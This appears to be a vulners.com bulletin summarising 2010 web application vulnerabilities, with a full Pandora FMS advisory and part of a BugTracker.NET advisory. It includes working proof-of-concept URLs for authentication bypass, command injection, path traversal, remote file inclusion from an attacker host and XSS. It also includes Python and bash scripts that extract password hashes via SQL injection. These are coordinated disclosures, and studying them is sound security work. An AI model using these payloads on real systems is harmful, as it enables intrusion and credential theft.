Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

2010-12-01T00:00:00

Description

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

Affected Software

CPE Name	Name	Version
	bugtracker.net	3.4
	alguest	1.1
	bravenewcode	1.9
	fabrica engine	2.1
	elxis cms	2009.2
	phpmyadmin	3.3
	eclime	1.1
	digitalus	1.10
	dynpg	4.2
	link protect	1.2
	archiva	1.3
	orbis cms	1.0

{"id": "SECURITYVULNS:VULN:11274", "bulletinFamily": "software", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2010-12-01T00:00:00", "modified": "2010-12-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11274", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:25211", "https://vulners.com/securityvulns/securityvulns:doc:25222", "https://vulners.com/securityvulns/securityvulns:doc:25205", "https://vulners.com/securityvulns/securityvulns:doc:25220", "https://vulners.com/securityvulns/securityvulns:doc:25204", "https://vulners.com/securityvulns/securityvulns:doc:25221", "https://vulners.com/securityvulns/securityvulns:doc:25217", "https://vulners.com/securityvulns/securityvulns:doc:25228", "https://vulners.com/securityvulns/securityvulns:doc:25231", "https://vulners.com/securityvulns/securityvulns:doc:25212", "https://vulners.com/securityvulns/securityvulns:doc:25224", "https://vulners.com/securityvulns/securityvulns:doc:25210", "https://vulners.com/securityvulns/securityvulns:doc:25227", "https://vulners.com/securityvulns/securityvulns:doc:25213", "https://vulners.com/securityvulns/securityvulns:doc:25218", "https://vulners.com/securityvulns/securityvulns:doc:25223", "https://vulners.com/securityvulns/securityvulns:doc:25225", "https://vulners.com/securityvulns/securityvulns:doc:25216", "https://vulners.com/securityvulns/securityvulns:doc:25206", "https://vulners.com/securityvulns/securityvulns:doc:25208", "https://vulners.com/securityvulns/securityvulns:doc:25214", "https://vulners.com/securityvulns/securityvulns:doc:25215", "https://vulners.com/securityvulns/securityvulns:doc:25209", "https://vulners.com/securityvulns/securityvulns:doc:25219", "https://vulners.com/securityvulns/securityvulns:doc:25207", "https://vulners.com/securityvulns/securityvulns:doc:25226"], "cvelist": ["CVE-2010-4283", "CVE-2010-4281", "CVE-2010-3449", "CVE-2010-4280", "CVE-2010-4329", "CVE-2010-4282", "CVE-2010-3266", "CVE-2010-3267", "CVE-2010-4278", "CVE-2010-4279"], "type": "securityvulns", "lastseen": "2021-06-08T18:46:23", "edition": 2, "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3266", "CVE-2010-3267", "CVE-2010-3449", "CVE-2010-4278", "CVE-2010-4279", "CVE-2010-4280", "CVE-2010-4281", "CVE-2010-4282", "CVE-2010-4283", "CVE-2010-4329", "CVE-2010-4408"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2139-1:FDD12"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2010-4329"]}, {"type": "exploitdb", "idList": ["EDB-ID:15639", "EDB-ID:15640", "EDB-ID:15641", "EDB-ID:15642", "EDB-ID:15643", "EDB-ID:15653", "EDB-ID:15710"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6851DB93B46D9C09D7BC200911D843CE", "EXPLOITPACK:73FC7D25E6C742650FE82F312F0B1D4F", "EXPLOITPACK:79EE56BF02CD5BA93DC282D5F692C3FF", "EXPLOITPACK:9B1C6B2B80B160E09AA3AB7E39A498B1", "EXPLOITPACK:AC313D70A27F793BE0833F2158F09EED", "EXPLOITPACK:DCDCA68A8D7F072D769CB6491CA7B34E", "EXPLOITPACK:F76D7386F0D2CD3AC198A2742E1CE4A3"]}, {"type": "fedora", "idList": ["FEDORA:AE678110DF3", "FEDORA:AF651110971"]}, {"type": "freebsd", "idList": ["753F8185-5BA9-42A4-BE02-3F55EE580093"]}, {"type": "nessus", "idList": ["5716.PRM", "DEBIAN_DSA-2139.NASL", "FEDORA_2010-18343.NASL", "FEDORA_2010-18371.NASL", "FREEBSD_PKG_753F81855BA942A4BE023F55EE580093.NASL", "PANDORA_FMS_AUTH_BYPASS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:100927", "OPENVAS:1361412562310100924", "OPENVAS:1361412562310100927", "OPENVAS:1361412562310100939", "OPENVAS:136141256231068698", "OPENVAS:136141256231068980", "OPENVAS:1361412562310831269", "OPENVAS:1361412562310862709", "OPENVAS:1361412562310862716", "OPENVAS:1361412562310902407", "OPENVAS:68698", "OPENVAS:68980", "OPENVAS:831269", "OPENVAS:862709", "OPENVAS:862716", "OPENVAS:902407"]}, {"type": "osv", "idList": ["OSV:DSA-2139-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129830", "PACKETSTORM:96259", "PACKETSTORM:96262"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2010-8"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25205", "SECURITYVULNS:DOC:25206", "SECURITYVULNS:DOC:25227", "SECURITYVULNS:DOC:25228", "SECURITYVULNS:DOC:25426", "SECURITYVULNS:DOC:25647", "SECURITYVULNS:VULN:11328", "SECURITYVULNS:VULN:11414"]}, {"type": "seebug", "idList": ["SSV:20283", "SSV:70305", "SSV:70306", "SSV:70307", "SSV:70308", "SSV:70309", "SSV:70369"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-4329"]}, {"type": "zdt", "idList": ["1337DAY-ID-23084"]}]}, "score": {"value": 1.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2010-3266", "CVE-2010-3267", "CVE-2010-3449", "CVE-2010-4278", "CVE-2010-4279", "CVE-2010-4280", "CVE-2010-4281", "CVE-2010-4282", "CVE-2010-4283", "CVE-2010-4329"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2139-1:FDD12"]}, {"type": "exploitdb", "idList": ["EDB-ID:15640", "EDB-ID:15641", "EDB-ID:15642", "EDB-ID:15643", "EDB-ID:15653", "EDB-ID:15710"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9B1C6B2B80B160E09AA3AB7E39A498B1"]}, {"type": "fedora", "idList": ["FEDORA:AF651110971"]}, {"type": "freebsd", "idList": ["753F8185-5BA9-42A4-BE02-3F55EE580093"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PANDORA_UPLOAD_EXEC"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_753F81855BA942A4BE023F55EE580093.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231068698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129830"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25208", "SECURITYVULNS:DOC:25211", "SECURITYVULNS:DOC:25214", "SECURITYVULNS:DOC:25221", "SECURITYVULNS:DOC:25224", "SECURITYVULNS:DOC:25226"]}, {"type": "seebug", "idList": ["SSV:70309"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-4329"]}, {"type": "zdt", "idList": ["1337DAY-ID-23084"]}]}, "exploitation": null, "vulnersScore": 1.6}, "affectedSoftware": [{"name": "bugtracker.net", "operator": "eq", "version": "3.4"}, {"name": "alguest", "operator": "eq", "version": "1.1"}, {"name": "bravenewcode", "operator": "eq", "version": "1.9"}, {"name": "fabrica engine", "operator": "eq", "version": "2.1"}, {"name": "elxis cms", "operator": "eq", "version": "2009.2"}, {"name": "phpmyadmin", "operator": "eq", "version": "3.3"}, {"name": "eclime", "operator": "eq", "version": "1.1"}, {"name": "digitalus", "operator": "eq", "version": "1.10"}, {"name": "dynpg", "operator": "eq", "version": "4.2"}, {"name": "link protect", "operator": "eq", "version": "1.2"}, {"name": "archiva", "operator": "eq", "version": "1.3"}, {"name": "orbis cms", "operator": "eq", "version": "1.0"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659962767}, "_internal": {"score_hash": "73a910d2e5557f2eb38b89467cfc7e9e"}}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:38", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nPandora FMS Authentication Bypass and Multiple Input Validation\r\nVulnerabilities\r\n\r\nCVE IDs in this security advisory:\r\n\r\n1) Authentication bypass - CVE-2010-4279\r\n2) OS Command Injection - CVE-2010-4278\r\n3) SQL Injection - CVE-2010-4280\r\n4) Blind SQL Injection - CVE-2010-4280\r\n5) Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283\r\n\r\n\r\n[+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n\r\n[+] Description and Proof of Concept\r\n\r\n\r\n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10\r\n\r\nAn attacker could access to any account user, including admin, using the\r\n"hash login" authentication process. This kind of authentication method\r\nworks providing a username and a hash. The issue could be exploited\r\nremotely providing a username and the md5 of it when\r\n$config['loginhash_pwd'] is empty, that in fact is the default\r\nconfiguration.\r\n\r\nSnippet of vulnerable code in index.php:\r\n\r\n136 // Hash login process\r\n137 if (! isset ($config['id_user']) && isset ($_GET["loginhash"])) {\r\n138 $loginhash_data = get_parameter("loginhash_data", "");\r\n139 $loginhash_user = get_parameter("loginhash_user", "");\r\n140\r\n141 if ($loginhash_data ==\r\nmd5($loginhash_user.$config["loginhash_pwd"])) {\r\n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);\r\n143 $_SESSION['id_usuario'] = $loginhash_user;\r\n144 $config["id_user"] = $loginhash_user;\r\n\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\r\n\r\nGot it! admin! :)\r\n\r\nBy default, any installation of this software allows unauthenticated\r\nattackers to perform an authentication bypass and a privilege escalation\r\nto admin.\r\n\r\n\r\n1.1) Additionally, a manual modification in order to use the hash_hmac\r\nfunction instead of the weak statement md5 ( $string . $KEY) is\r\nencouraged for security purposes.\r\n\r\nSnippet of code (index.php, version 3.1.1):\r\n\r\n145 // Hash login process\r\n(...)\r\n150 if ($config["loginhash_pwd"] != "" && $loginhash_data ==\r\nmd5($loginhash_user.$config["loginhash_pwd"])) {\r\n\r\nIn line 150, use\r\nhash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of\r\nmd5($lioginhash_user.$config["loginhash_pwd"])\r\n\r\n\r\n2) OS Command Injection - CVE-2010-4278 - CVSS 9/10\r\n\r\nThe layout parameter in file operation/agentes/networkmap.php is not\r\nproperly filtered and allows an attacker to inject OS commands.\r\n\r\nSnippet of vulnerable code (file operation/agentes/networkmap.php):\r\n\r\n32 $layout = (string) get_parameter ('layout', 'radial');\r\n...\r\n137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;\r\n138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;\r\n139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;\r\n...\r\n162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng\r\n- -o".$filename_img." ".$filename_dot;\r\n163 $result = system ($cmd);\r\n\r\nPoC:\r\n\r\nhttp://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a;\r\nhttp://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id;\r\n\r\nIf we use vulnerability #1 (that permits bypass the authentication\r\nsystem and login as admin) with this issue, the CVSS will be 10/10.\r\n\r\n\r\n3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10\r\n\r\nThe parameter id_group when get_agents_group_json is equal to 1 is\r\nvulnerable to SQL Injection attacks.\r\n\r\nPoC:\r\nhttp://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\r\n\r\n\r\nExploit:\r\n\r\n# Pandora Flexible Monitoring System SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Gets the list of users and password from the database\r\n#\r\n#configure cookie&host before use it\r\n#usage\r\n#python sqlinj_users.py\r\n#admin:75b756ff2785ea8bb9ae02c13b6a71f1\r\n#...\r\n\r\nimport json\r\nimport urllib2\r\n\r\nheaders = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}\r\n\r\nurl = "http://HOST/pandora_console/ajax.php"\r\nurl+=\r\n"?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1"\r\nurl+=\r\n"/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario"\r\n\r\nreq = urllib2.Request(url,headers=headers)\r\nresp = urllib2.urlopen(req)\r\n\r\nusers = json.read(resp.read())\r\nfor user in users:\r\n print(user["id_agente"]+":"+user["nombre"])\r\n\r\n\r\nThe fix to these kind of issues was the implementation of a generic\r\nfilter against sql injection. A proper fix is planned for a major version.\r\n\r\n\r\n4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10\r\n\r\nThe parameter group_id of operation/agentes/estado_agente.php is\r\nvulnerable to blind sql injection.\r\n\r\n\r\nPoC:\r\nhttp://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281\r\n\r\n\r\nExploit:\r\n\r\n#!/bin/bash\r\n# Pandora Flexible Monitoring System Blind SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Gets the md5 hash password from a specific user\r\n#\r\n#configure host,cookie&group_id before use it\r\n#usage\r\n#$ ./getpassword.sh\r\n#74b444ff2785ea8bb9ae02c13b6a71f1\r\n\r\nHOST="HOST"\r\nTARGET_USER="0x61646d696e" #admin\r\nPATTERN="Interval"\r\nCOOKIE="rq842tci6e5ib7t918c6sv1ml4"\r\nCHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v\r\nw x y z)\r\nGROUP_ID=2\r\n\r\nj=1\r\nwhile [[ $j -lt 33 ]]; do\r\n i=0\r\n while [[ $i -lt ${#CHARSET[@]} ]]; do\r\n c=$(printf '%d' "'${CHARSET[$i]}")\r\n\r\nURL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";\r\n curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q\r\n$PATTERN;\r\n if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;\r\n let i++\r\n done;\r\n if [[ $i -eq ${#CHARSET[@]} ]]; then echo "Something went wrong!";\r\nexit 1; fi\r\n let j++;\r\ndone\r\necho\r\nexit 0\r\n\r\n\r\nThe fix to these kind of issues was the implementation of a generic\r\nfilter against sql injection. A proper fix is planned for a major version.\r\n\r\n\r\n5) Path Traversal:\r\n\r\n5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) -\r\nCVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10\r\n\r\nParameter 'page' of ajax.php is not properly sanitizing user-supplied\r\ninput. The function safe_url_extraclean is filtering ':' character, and\r\nit doesn't allow to use the string "http://" to create urls, but allows\r\n'/' character and an attacker could reference remote resources via\r\nWindows UNC files, using //servername//resource/file\r\n\r\nNote that the first check in safe_url_extraclean is filtering '://', so\r\nwe can bypass the filter easily doing http://http://url, and it only\r\nstrip the first protocol://. However, the last preg_replace strips the :\r\ncharacter.\r\n\r\nProof of concept:\r\n\r\nUNC: http://servername/pandora_console/ajax.php?page=//server/share/test\r\n\r\nAs well, ajax.php allows to include any php file in the disk\r\n\r\nfilesystem:\r\nhttp://servername/pandora_console/ajax.php?page=../../../../../directory/file\r\n\r\nCharacter %00 is not allowed due safe_url_extraclean function filtering,\r\nand is not possible to include other files distinct that php files, but\r\nstill allows . and / characters.\r\n\r\n\r\n5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283\r\n- - CVSS 7.9/10\r\n\r\nAn attacker can inject arbitrary PHP code and execute it remotely due\r\nargv[1] parameter is not filtered in file pandora_diag.php.\r\n\r\nPoC:\r\nhttp://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php%00\r\n\r\nNote: that issue needs register_globals set to On to be exploitable.\r\n\r\n\r\n5.3 - Path traversal & Local file inclusion vulnerabilities -\r\nCVE-2010-4282 - CVSS 6.8/10\r\n\r\nAn attacker can include arbitrary files of the filesystem via id\r\nparameter in file pandora_help.php.\r\n\r\n\r\nSnippet of vulnerable code:\r\n\r\n 24 $id = get_parameter ('id');\r\n 25\r\n 26 /* Possible file locations */\r\n 27 $files = array\r\n($config["homedir"]."/include/help/".$config["language"]."/help_".$id.".php",\r\n 28\r\n$config["homedir"].ENTERPRISE_DIR."/include/help/".$config["language"]."/help_".$id.".php",\r\n 29\r\n$config["homedir"].ENTERPRISE_DIR."/include/help/en/help_".$id.".php",\r\n 30 $config["homedir"]."/include/help/en/help_".$id.".php");\r\n 31 $help_file = '';\r\n 32 foreach ($files as $file) {\r\n 33 if (file_exists ($file)) {\r\n 34 $help_file = $file;\r\n 35 break;\r\n 36 }\r\n 37 }\r\n...\r\n 62 require_once ($help_file);\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini%00\r\n\r\nThis code is platform dependent bug, you can read more at\r\nhttp://seclists.org/fulldisclosure/2010/Jul/137\r\nOnly works in windows systems, an attacker can include local file using\r\n../ characters due parameter id is not filtered\r\nIf magic_quotes_gpc is Off, arbitrary files can be included, like\r\nboot.ini using NULL character (%00), if not, only php files are allowed\r\n\r\n\r\n5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282\r\n- - CVSS 8.0/10\r\n\r\nIn file operation/agentes/networkmap.php the 'layout' parameter is\r\nhandled in an insecure way and it is used to write and delete files on\r\nthe filesystem.\r\nAn attacker could use this parameter to write in arbitrary paths and\r\neven remove files.\r\n\r\nSnippet of vulnerable code:\r\n\r\n32 $layout = (string) get_parameter ('layout', 'radial');\r\n...\r\n137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;\r\n138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;\r\n139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;\r\n...\r\n157 $fh = @fopen ($filename_dot, 'w');\r\n158 if ($fh === false) {\r\n159 $result = false;\r\n160 } else {\r\n161 fwrite ($fh, $graph);\r\n162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng\r\n- -o".$filename_img." ".$filename_dot;\r\n163 $result = system ($cmd);\r\n164 fclose ($fh);\r\n165 unlink ($filename_dot);\r\n166 }\r\n...\r\n178 require ($filename_map);\r\n\r\n\r\nCharacter sequences '../' could be used to write files (due -o parameter\r\nin lines 162 and 163), as well as potentially remove files (line 157,\r\n161 and 165) or include them (line 178)\r\nAs well like in 5.3 this issue is only exploitable in windows\r\nenvironments because the same reason.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NIMAAoJEJaV5RMdiDI75QEP/jc/7zYJCFUTCCzfbVEOgECp\r\n//N5GUaV/TdIVCDcGKu+/09kbDewhU/hwcxNEH7H1EC80Xv2qx1gkrvcHiDsbITY\r\nsCrMd2JfOsT2xAFPYbuiD5QLvDcqjSj/rgVxjJFvMfe21HjYq7JmPl48jY9pvhXL\r\n8zG6qarJ6lKD+pSfhFeI3OgZiNF0Ws5yzh3Byq4aeRcIGWzLahYZ7upyHnAsDon8\r\nb8EqZao0gKvkWVZHEPm13WtLfZvwly6KhBkmgfaALJVO4WZ7dEHyy6/obokaYzgc\r\nnMA2ZiTyhXTTNlRtcFvbvU5clglu1eZr/hnEvi4L7UIGg00HkdqqiDMl6JmX6QWi\r\nClUihkcSMxfgndDYib1Xebhghe+T6w0GLbUi40A40ByOrGAdU8UF6bo4Mh8EIgkX\r\nQrWR6M/nr+3GRf+LWgekKozqqFQNDQFeYq5qv16jGRiqO+Rn9yFjlqcjGY0Qx6DO\r\nzVY23OaXXjYkNIfHO+HX4pVhyomrg/oa9rLfjzx8tEieRTZDPDgyn33LP11IzE61\r\nJN8T77VhuwkkYf1v6kzqvbzqNmkTslvk1PR38HUCGY+Sm6pejUsVyIWnt2goqprW\r\ntzbnxGOqmDHFfQ66F0HZkvY8eR0BRuaYZnYNSbzf65F0WmLh6usFOZfrWaZ9baSG\r\nPee6VRKILvel2NRtvF+3\r\n=Adj0\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2010-12-01T00:00:00", "title": "Pandora FMS Authentication Bypass and Multiple Input Validation Vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-4283", "CVE-2010-4281", "CVE-2010-4280", "CVE-2010-4282", "CVE-2010-4278", "CVE-2010-4279"], "modified": "2010-12-01T00:00:00", "id": "SECURITYVULNS:DOC:25206", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25206", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:38", "description": " Core Security Technologies - CoreLabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in BugTracker.Net\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in BugTracker.Net\r\nAdvisory Id: CORE-2010-1109\r\nAdvisory URL:\r\n[http://www.coresecurity.com/content/multiple-vulnerabilities-in-bugtracker]\r\nDate published: 2010-11-30\r\nDate of last update: 2010-11-30\r\nVendors contacted: BugTracker.NET team\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Cross site scripting [CWE-79], SQL injection [CWE-89]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2010-3266, CVE-2010-3267\r\nBugtraq ID: N/A\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nBugTracker.NET [1][2] is an open-source web-based bug tracker written\r\nusing ASP.NET, C#, and Microsoft SQL Server. Several cross-site\r\nscripting and SQL-injection vulnerabilities were found in the following\r\nfiles of the BugTracker.NET:\r\n\r\n . *bugs.aspx*. SQL injection in line 141.\r\n . *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30.\r\n . *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857.\r\n . *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214.\r\n . *edit_bug.aspx*. XSS in line 2918.\r\n . *edit_comment.aspx*. XSS in line 233.\r\n . *edit_customfield.aspx*. Lines 165 and 172, no sanitization.\r\n . *edit_user_permissions2.aspx*. XSS in line 40.\r\n . *massedit.aspx*. SQL Injection in line 162.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . BugTracker.NET v3.4.4.\r\n . Older versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . BugTracker.NET v3.4.5.\r\n\r\n\r\n6. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Damian Saura\r\n[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Damian_Saura]\r\nand Alejandro Frydman from Core Security Technologies.\r\n\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *XSS Vulnerabilities*\r\n\r\n[CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in\r\nsimilar ways. The following proof of concept shows how to exploit the\r\nXSS founded in 'edit_comment.aspx':\r\n\r\n/-----\r\n... \r\n230 <div class=align>\r\n231 <table border=0><tr><td>\r\n232\r\n233 <a href=edit_bug.aspx?id=<%\r\nResponse.Write(Request["bug_id"]);%>>back to <%\r\nResponse.Write(btnet.Util.get_setting("SingularBugLabel","bug")); %></a>\r\n234 <form class=frm runat="server">\r\n235\r\n236 <table border=0>\r\n...\r\n-----/\r\n First, login to BugTracker and create a comment in a previously created\r\nbug. Then, edit it using this URL:\r\n\r\n/-----\r\nhttp://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E\r\n-----/\r\n As a result, the JavaScript code injected into the parameter 'bug_id'\r\nwill be rendered without sanitization in the line 233, and executed in\r\nthe context of the client's web browser.\r\n\r\n\r\n7.2. *SQL Injection Vulnerabilities*\r\n\r\n[CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be\r\nexploited in similar ways. Consider, for example, the code located in\r\n'delete_query.aspx':\r\n\r\n/-----\r\n...\r\n26 if (IsPostBack)\r\n27 {\r\n28 // do delete here\r\n29 sql = @"delete queries where qu_id = $1";\r\n30 sql = sql.Replace("$1", row_id.Value);\r\n31 btnet.DbUtil.execute_nonquery(sql);\r\n32 Server.Transfer ("queries.aspx");\r\n33 }\r\n...\r\n-----/\r\n In line 30, the value of 'row_id' is injected without sanitization into\r\nthe SQL query. This value arrives to the server in a hidden field of a\r\nclient request. As a result, a malicious user can manipulate this value\r\nin order to execute code in the database layer of the application.\r\n\r\n\r\n8. *Report Timeline*\r\n\r\n. 2010-11-29:\r\nCore Security Technologies notifies the BugTracker team of the\r\nvulnerability, setting the estimated publication date of the advisory to\r\nDecember 20th 2010.\r\n\r\n. 2010-11-29:\r\nThe BugTracker team asks Core for a technical description of the\r\nvulnerability.\r\n\r\n. 2010-11-29:\r\nTechnical details sent to BugTracker team.\r\n\r\n. 2010-11-29:\r\nThe BugTracker team acknowledges the report and notifies they will fix\r\nall issues in 1 or 2 working days.\r\n\r\n. 2010-11-30:\r\nThe BugTracker team notifies that a patched version is publicly\r\navailable at Sourceforge and Codeplex.\r\n\r\n. 2010-11-30:\r\nThe advisory CORE-2010-1109 is published.\r\n\r\n\r\n9. *References*\r\n\r\n[1] BugTracker.NET official website:\r\n[http://ifdefined.com/bugtrackernet.html].\r\n[2] BugTracker.NET Source Forge project:\r\n[http://sourceforge.net/projects/btnet/].\r\n\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and 